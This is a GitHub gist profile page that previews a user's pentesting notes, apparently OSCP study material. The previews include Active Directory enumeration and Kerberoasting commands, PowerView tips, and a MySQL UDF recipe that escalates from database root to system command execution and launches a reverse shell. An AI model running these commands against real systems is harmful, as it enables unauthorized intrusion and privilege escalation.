Skip to content

Instantly share code, notes, and snippets.

View rahmiy's full-sized avatar

Rahmi YILDIZ rahmiy

View GitHub Profile
@rahmiy
rahmiy / semaphore-binary-merkle-root-fix_attestation.log
Created August 22, 2025 18:09
Attestation for Semaphore Binary Merkle Root Fix MPC Phase 2 Trusted Setup ceremony
Hey, I'm rahmiy-47624452 and I have contributed to the Semaphore Binary Merkle Root Fix MPC Phase2 Trusted Setup ceremony.
The following are my contribution signatures:
Circuit # 1 (semaphore-1)
Contributor # 1282
Contribution Hash: 8c9dddd5 6a99ae74 2d4621d2 204747d0
753aefdc d0cdcdf0 647cea1a 5c6f18c8
ada1ebdb f8b354be 6501c3c4 2113c6cb
794f6191 81229e81 e5801f47 583c6e09
@rahmiy
rahmiy / oscp_prep.md
Created January 7, 2024 13:40 — forked from AvasDream/oscp_prep.md
Resource for OSCP like HTB Boxes with Ippsec Videos and Writeups.
@rahmiy
rahmiy / Active Directory Attacks.md
Created November 20, 2022 10:51 — forked from ssstonebraker/Active Directory Attacks.md
Active Directory Attacks #oscp
# Enumeration
# Credential Injection
runas.exe /netonly /user:<domain>\<username> cmd.exe
# enumeration users
users
net user /domain
========================================================================================================================
Kerberos Attacks
========================================================================================================================
[+] Kerbose attack
./GetUserSPNs.py -dc-ip 192.168.168.10 sittingduck.info/notanadmin
@rahmiy
rahmiy / PowerView-3.0-tricks.ps1
Created November 17, 2022 14:31 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@rahmiy
rahmiy / mysql_root_to_system_root
Created August 14, 2021 23:58 — forked from p0c/mysql_root_to_system_root
#pentest #recipe: mysql root -> system root (linux)
# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...)
mysql> use mysql;
mysql> create table test(line blob);
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('./reverse_shell &');
@rahmiy
rahmiy / setupmykl.sh
Created August 12, 2020 07:49 — forked from todmephis/setupmykl.sh
Script to setup my kl installation. (deprecated)
#!/bin/bash
#LAST UPDATE: 30/03/2020
#LAS CHANGE: added pkg-config.
RED='\033[0;31m'
GRN='\033[0;32m'
YLL='\033[1;33m'
NC='\033[0m' # No Color
#FILE NAMES
PTROOTDIR="pentestTools"
PTDIRS="{lists,tools,shells/{klbuiltin,}}"
@rahmiy
rahmiy / cis_centos7_hardening.sh
Created August 12, 2020 07:48 — forked from todmephis/cis_centos7_hardening.sh
Hardening CentOS 7 CIS script
#!/bin/bash
MODPROBEFILE="/etc/modprobe.d/CIS.conf"
#MODPROBEFILE="/tmp/CIS.conf"
ANSWER=0
analyze_part () {
if [ "$#" != "1" ]; then
options="$(echo $@ | awk 'BEGIN{FS="[()]"}{print $2}')"
echo "[+]$@"
apply_part_rule $1
@rahmiy
rahmiy / Automating scanning with fish shell
Created August 12, 2020 07:46 — forked from todmephis/Automating scanning with fish shell
Automating scanning with fish shell
=======================HOST DISCOVERY===========================================
Host discovery con PING:
$ for octect in (seq 0 254)
echo "Pinging [X.X.X.$octect]"
ping -c 2 10.150.150.$octect | grep "bytes from" | awk '{print $4}' | uniq -d | cut -d ":" -f 1 | tee -a targets.list
end
Host discovery con NMAP IMCP o ARP
$sudo nmap -vv -sn -PE 10.150.150.0/24 -oG HOSTDISCOVERY_ICMP.gnmap